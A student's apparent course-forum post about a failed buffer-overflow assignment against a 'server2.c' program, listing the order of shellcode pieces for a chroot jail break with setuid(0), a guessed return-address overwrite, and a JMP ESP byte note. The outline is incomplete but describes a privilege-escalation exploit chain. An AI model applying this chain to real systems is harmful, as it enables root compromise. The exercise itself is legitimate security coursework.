CS591 ST 008

I've spent a few hours trying to find the magic address value for i[129].

After emailing with Jed, I've looked at the dump file and tried to relate it to the server2.c file. I'm just not too sure how to read this dump file. I'm looking for an address where the size value would be pushed onto the stack.

I'm done guessing. I"ve tried just about every address that I could possibly think would be a location for the stringLength variable being passed into the Capitalize function as the last parameter. I believe once I find the location of the stack for this function call, I would then need to add 8*511 to that address to represent offset location of the last char position in the array of data..?

I'll take my 0.
This is foo-bar'ed...I haven't even started to look at the new test...uggg.

Here is what I have:
the root jail break order-
strcat(myexploit, nopsled);
strcat(myexploit, mkdir);
strcat(myexploit, chroota);
strcat(myexploit, setuidzero);
strcat(myexploit, chdirloop);
strcat(myexploit, chrootdotdot);
strcat(myexploit, doexecve);

the i[129] value:
i[129] = 0x080487d0; //note, i've tried so many values from the dump file

the magic number for the printf:
//should be JMP ESP ..... 0xff 0xe4
printf("58623\n"); //little endian, so 0xe4 0xff